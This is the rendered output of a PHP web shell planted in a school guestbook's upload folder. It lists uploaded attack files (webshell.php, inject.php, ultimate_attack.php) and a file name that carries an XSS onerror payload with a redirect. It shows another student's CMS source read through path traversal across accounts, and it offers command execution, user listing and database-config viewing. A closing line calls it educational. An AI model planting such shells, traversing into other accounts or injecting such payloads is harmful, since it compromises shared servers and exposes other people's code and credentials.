🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ../../../../586648.klas4s23.mid-ica.nl/public_html/VillaVerkenner/CMS/CreateVilla.php

<?php
ini_set('display_errors', '1');
ini_set('display_startup_errors', '1');
error_reporting(E_ALL);

include "../includes/databaseConn.php";

$database = new Database();
$conn = $database->getConnection();

// Fetch villa types
try {
    $typeStmt = $conn->prepare("SELECT villa_type_id, naam FROM villa_types ORDER BY naam");
    $typeStmt->execute();
    $villaTypes = $typeStmt->fetchAll(PDO::FETCH_ASSOC);
} catch (PDOException $e) {
    $villaTypes = [];
}

// Fetch ligging tags
try {
    $liggingStmt = $conn->prepare("SELECT tag_id, naam FROM ligging_tags ORDER BY naam");
    $liggingStmt->execute();
    $villaligging = $liggingStmt->fetchAll(PDO::FETCH_ASSOC);
} catch (PDOException $e) {
    $villaligging = [];
}

// Fetch eigenschappen
try {
    $EigenschapStmt = $conn->prepare("SELECT * FROM eigenschappen ORDER BY naam");
    $EigenschapStmt->execute();
    $VillaEigenschappen = $EigenschapStmt->fetchAll(PDO::FETCH_ASSOC);
} catch (PDOException $e) {
    $VillaEigenschappen = [];
}

$errors = [];
$old = [
    'titel'=>'', 'adres'=>'', 'postcode'=>'', 'plaats'=>'', 'capaciteit'=>'', 'slaapkamers'=>'', 'badkamers'=>'', 'prijs_per_nacht'=>'', 'omschrijving'=>'', 'villa_type_id'=>'', 'villa_eigenschappen'=>[], 'ligging_tags'=>[], 'is_gepubliceerd'=>1
];

$uploadDir = __DIR__ . DIRECTORY_SEPARATOR . 'UploadedImages';
if (!is_dir($uploadDir)) {
    @mkdir($uploadDir, 0755, true);
}

$allowedExt = ['jpg','jpeg','png','gif','webp'];
$maxSize = 2 * 1024 * 1024;

if ($_SERVER["REQUEST_METHOD"] === "POST") {
    $titel = trim($_POST['titel'] ?? '');
    $adres = trim($_POST['adres'] ?? '');
    $postcode = trim($_POST['postcode'] ?? '');
    $plaats = trim($_POST['plaats'] ?? '');
    $capaciteit = $_POST['capaciteit'] ?? '';
    $slaapkamers = $_POST['slaapkamers'] ?? '';
    $badkamers = $_POST['badkamers'] ?? '';
    $prijs_per_nacht = $_POST['prijs_per_nacht'] ?? '';
    $omschrijving = trim($_POST['omschrijving'] ?? '');
    $villa_type_id = $_POST['villa_type_id'] ?? null;
    $ligging_tags = $_POST['ligging_tags'] ?? []; // Changed to array for checkboxes
    $villa_eigenschappen = $_POST['villa_eigenschappen'] ?? [];
    $is_gepubliceerd = isset($_POST['is_gepubliceerd']) ? 1 : 0;

    $old = compact('titel','adres','postcode','plaats','capaciteit','slaapkamers','badkamers','prijs_per_nacht','omschrijving','villa_type_id','villa_eigenschappen','ligging_tags');
    $old['is_gepubliceerd'] = $is_gepubliceerd;

    if ($titel === '') $errors[] = "Titel is required.";
    if ($adres === '') $errors[] = "Adres is required.";
    if ($plaats === '') $errors[] = "Plaats is required.";
    if ($postcode === '') $errors[] = "Postcode is required.";
    if ($capaciteit === '' || !filter_var($capaciteit, FILTER_VALIDATE_INT)) $errors[] = "Valid capaciteit is required.";
    if ($slaapkamers === '' || !filter_var($slaapkamers, FILTER_VALIDATE_INT)) $errors[] = "Valid aantal slaapkamers is required.";
    if ($badkamers === '' || !filter_var($badkamers, FILTER_VALIDATE_INT)) $errors[] = "Valid aantal badkamers is required.";
    if ($prijs_per_nacht === '' || !is_numeric($prijs_per_nacht)) $errors[] = "Valid prijs_per_nacht is required.";
    if ($omschrijving === '') $errors[] = "Omschrijving is required.";

    $saveUpload = function($inputName) use ($uploadDir, $allowedExt, $maxSize, &$errors) {
        if (!isset($_FILES[$inputName]) || $_FILES[$inputName]['error'] === UPLOAD_ERR_NO_FILE) {
            return '';
        }
        $file = $_FILES[$inputName];
        if ($file['error'] !== UPLOAD_ERR_OK) {
            $errors[] = "{$inputName}: upload error ({$file['error']}).";
            return '';
        }
        if ($file['size'] > $maxSize) {
            $errors[] = "{$inputName}: file too large.";
            return '';
        }
        $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
        if (!in_array($ext, $allowedExt, true)) {
            $errors[] = "{$inputName}: invalid file type ({$ext}).";
            return '';
        }
        $safeName = uniqid($inputName . '_') . '.' . preg_replace('/[^a-z0-9]/', '', $ext);
        $dest = $uploadDir . DIRECTORY_SEPARATOR . $safeName;
        if (!move_uploaded_file($file['tmp_name'], $dest)) {
            $errors[] = "{$inputName}: failed to move uploaded file.";
            return '';
        }
        return 'CMS/UploadedImages/' . $safeName;
    };

    $uploads = [];
    $uploads[] = $saveUpload('InsertImageMain');
    $uploads[] = $saveUpload('InsertImageA');
    $uploads[] = $saveUpload('InsertImageB');
    $uploads[] = $saveUpload('InsertImageC');
    $uploads[] = $saveUpload('InsertImageD');

    if (empty($errors)) {
        try {
            $conn->beginTransaction();

            // Insert villa WITHOUT tag_id column
            $sql = "INSERT INTO `villas` (titel, adres, postcode, plaats, capaciteit, slaapkamers, badkamers, prijs_per_nacht, omschrijving, villa_type_id, is_gepubliceerd)
                    VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)";
            $stmt = $conn->prepare($sql);

            $vt = ($villa_type_id === '' || $villa_type_id === null) ? null : intval($villa_type_id);
            $cap = intval($capaciteit);
            $slaap = intval($slaapkamers);
            $bad = intval($badkamers);
            $price = floatval($prijs_per_nacht);
            $pub = intval($is_gepubliceerd);

            $stmt->execute([$titel, $adres, $postcode, $plaats, $cap, $slaap, $bad, $price, $omschrijving, $vt, $pub]);

            $villa_id = $conn->lastInsertId();

            // Insert eigenschappen into junction table
            if (!empty($villa_eigenschappen)) {
                $eigenschapSql = "INSERT INTO `villa_eigenschappen` (villa_id, eigenschap_id) VALUES (?, ?)";
                $eigenschapStmt = $conn->prepare($eigenschapSql);
                
                foreach ($villa_eigenschappen as $eigenschap_id) {
                    $eigenschapStmt->execute([$villa_id, intval($eigenschap_id)]);
                }
            }

            // Insert ligging tags into junction table
            if (!empty($ligging_tags)) {
                $liggingSql = "INSERT INTO `villa_ligging_tags` (villa_id, tag_id) VALUES (?, ?)";
                $liggingStmt = $conn->prepare($liggingSql);
                
                foreach ($ligging_tags as $tag_id) {
                    $liggingStmt->execute([$villa_id, intval($tag_id)]);
                }
            }

            // Insert photos
            if (!empty($uploads)) {
                $photoSql = "INSERT INTO `fotos` (villa_id, bestandspad, is_hoofdfoto) VALUES (?, ?, ?)";
                $photoStmt = $conn->prepare($photoSql);

                foreach ($uploads as $index => $imagePath) {
                    if (!empty($imagePath)) {
                        $isHoofdfoto = ($index === 0) ? 1 : 0;
                        $photoStmt->execute([$villa_id, $imagePath, $isHoofdfoto]);
                    }
                }
            }

            $conn->commit();
            header("Location: CMS.php");
            exit();
        } catch (PDOException $e) {
            $conn->rollBack();
            $errors[] = "Database error: " . $e->getMessage();
        }
    }
}
?>
<!DOCTYPE html>
<html lang="nl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Create Villa</title>
    <link rel="stylesheet" href="CMS.css?v=<?php echo time(); ?>">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css">
</head>
<body>
    <div class="CMSHeader">
        <div class="CMSTitle">Create New Villa</div>
        <a href="CMS.php" class="btn-secondary">< Cancel</a>
    </div>

    <?php if (!empty($errors)): ?>
        <div class="error-container">
            <?php foreach ($errors as $e): ?>
                <div class="error-message">
                    <i class="fas fa-exclamation-triangle"></i>
                    <?php echo htmlspecialchars($e); ?>
                </div>
            <?php endforeach; ?>
        </div>
    <?php endif; ?>

    <div class="villa-list">
        <form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>" method="post" enctype="multipart/form-data">
            <div class="form-gridA">
                <div class="form-group">
                    <label for="titel"><i class="fas fa-home"></i> Titel:</label>
                    <input type="text" id="titel" name="titel" required value="<?php echo htmlspecialchars($old['titel']); ?>">
                </div>

                <div class="form-group">
                    <label for="villa_type_id"><i class="fas fa-building"></i> Villa Type:</label>
                    <select id="villa_type_id" name="villa_type_id">
                        <option value="">Selecteer een villa type</option>
                        <?php foreach ($villaTypes as $type): ?>
                            <option value="<?php echo $type['villa_type_id']; ?>" 
                                    <?php echo $old['villa_type_id'] == $type['villa_type_id'] ? 'selected' : ''; ?>>
                                <?php echo htmlspecialchars($type['naam']); ?>
                            </option>
                        <?php endforeach; ?>
                    </select>
                </div>

                <!-- Changed to checkboxes like eigenschappen -->
                <div class="form-group">
                    <label><i class="fas fa-map-pin"></i> Villa Ligging:</label>
                    <div style="margin-top: 10px;">
                        <?php foreach ($villaligging as $ligging): ?>
                            <input type="checkbox" 
                                name="ligging_tags[]" 
                                value="<?php echo $ligging['tag_id']; ?>"
                                <?php echo (is_array($old['ligging_tags']) && in_array($ligging['tag_id'], $old['ligging_tags'])) ? 'checked' : ''; ?>
                                style="margin-right: 8px;">
                            <?php echo htmlspecialchars($ligging['naam']); ?>
                            <br>
                        <?php endforeach; ?>
                    </div>
                </div>
                
                <div class="form-group">
                    <label><i class="fas fa-list"></i> Villa Eigenschappen:</label>
                    <div style="margin-top: 10px;">
                        <?php foreach ($VillaEigenschappen as $eigenschap): ?>
                            <input type="checkbox" 
                                name="villa_eigenschappen[]" 
                                value="<?php echo $eigenschap['eigenschap_id']; ?>"
                                <?php echo (is_array($old['villa_eigenschappen']) && in_array($eigenschap['eigenschap_id'], $old['villa_eigenschappen'])) ? 'checked' : ''; ?>
                                style="margin-right: 8px;">
                            <?php echo htmlspecialchars($eigenschap['naam']); ?>
                            <br>
                        <?php endforeach; ?>
                    </div>
                </div>

                <div class="form-group">
                    <label for="adres"><i class="fas fa-map-marker-alt"></i> Adres:</label>
                    <input type="text" id="adres" name="adres" required value="<?php echo htmlspecialchars($old['adres']); ?>">
                </div>

                <div class="form-group">
                    <label for="postcode"><i class="fas fa-mail-bulk"></i> Postcode:</label>
                    <input type="text" id="postcode" name="postcode" required value="<?php echo htmlspecialchars($old['postcode']); ?>">
                </div>

                <div class="form-group">
                    <label for="plaats"><i class="fas fa-city"></i> Plaats:</label>
                    <input type="text" id="plaats" name="plaats" required value="<?php echo htmlspecialchars($old['plaats']); ?>">
                </div>

                <div class="form-group">
                    <label for="capaciteit"><i class="fas fa-users"></i> Capaciteit:</label>
                    <input min="1" max="12" type="number" id="capaciteit" name="capaciteit" required value="<?php echo htmlspecialchars($old['capaciteit']); ?>">
                </div>

                <div class="form-group">
                    <label for="slaapkamers"><i class="fas fa-bed"></i> Slaapkamers:</label>
                    <input min="1" max="6" type="number" id="slaapkamers" name="slaapkamers" required value="<?php echo htmlspecialchars($old['slaapkamers']); ?>">
                </div>

                <div class="form-group">
                    <label for="badkamers"><i class="fas fa-bath"></i> Badkamers:</label>
                    <input min="1" max="6" type="number" id="badkamers" name="badkamers" required value="<?php echo htmlspecialchars($old['badkamers']); ?>">
                </div>

                <div class="form-group">
                    <label for="prijs_per_nacht"><i class="fas fa-euro-sign"></i> Prijs per nacht:</label>
                    <input min="1" max="2000" type="number" id="prijs_per_nacht" name="prijs_per_nacht" step="0.01" required value="<?php echo htmlspecialchars($old['prijs_per_nacht']); ?>">
                </div>
            </div>

            <div class="form-group full-width">
                <label for="omschrijving"><i class="fas fa-align-left"></i> Omschrijving:</label>
                <textarea id="omschrijving" name="omschrijving" required rows="5"><?php echo htmlspecialchars($old['omschrijving']); ?></textarea>
            </div>

            <div class="form-group">
                <label class="checkbox-label">
                    <input type="checkbox" name="is_gepubliceerd" <?php echo !empty($old['is_gepubliceerd']) ? 'checked' : ''; ?>>
                    <i class="fas fa-eye"></i> Gepubliceerd
                </label>
            </div>
            
            <div class="">
                <label><i class="fas fa-images"></i> Villa Images:</label>
                <div class="form-gridB">
                    <div class="file-upload-item">
                        <label for="InsertImageMain">Main Image:</label>
                        <input type="file" id="InsertImageMain" name="InsertImageMain" accept="image/*" required>
                    </div>
                    <div class="file-upload-item">
                        <label for="InsertImageA">Image A:</label>
                        <input type="file" id="InsertImageA" name="InsertImageA" accept="image/*" required>
                    </div>
                    <div class="file-upload-item">
                        <label for="InsertImageB">Image B:</label>
                        <input type="file" id="InsertImageB" name="InsertImageB" accept="image/*" required>
                    </div>
                    <div class="file-upload-item">
                        <label for="InsertImageC">Image C:</label>
                        <input type="file" id="InsertImageC" name="InsertImageC" accept="image/*" required>
                    </div>
                    <div class="file-upload-item">
                        <label for="InsertImageD">Image D:</label>
                        <input type="file" id="InsertImageD" name="InsertImageD" accept="image/*" required>
                    </div>
                </div>
            </div>

            <div class="form-actions">
                <input type="submit" value="Create Villa" class="btn-primary">
            </div>
        </form>
    </div>
</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!